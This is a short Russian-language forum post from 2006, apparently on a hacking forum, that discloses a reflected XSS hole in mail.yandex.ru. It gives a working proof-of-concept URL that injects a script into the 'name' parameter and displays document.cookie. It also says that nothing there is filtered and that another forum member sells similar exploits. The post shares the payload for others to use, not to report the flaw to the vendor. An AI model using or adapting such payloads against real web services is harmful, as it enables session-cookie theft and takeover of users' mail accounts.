05.11.2006, 05:36
|
|
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами:
10925666
Репутация:
454
|
|
mail.yandex.ru passive xss
Вот, наткнулся... Т.к. пассивная, выкладываю сюда.
Совершенно ничего не фильтруется, вообщем good 
-http://mail.yandex.ru/colabook_formaddp?name="><script>alert(document.co okie)</script>
+ один товарищ тут продает нечто подобное.
З.Ы. Почему бы не закрепить yandex и rambler в этом разделе, т.к. это уже сделано с mail.ru? |
|
|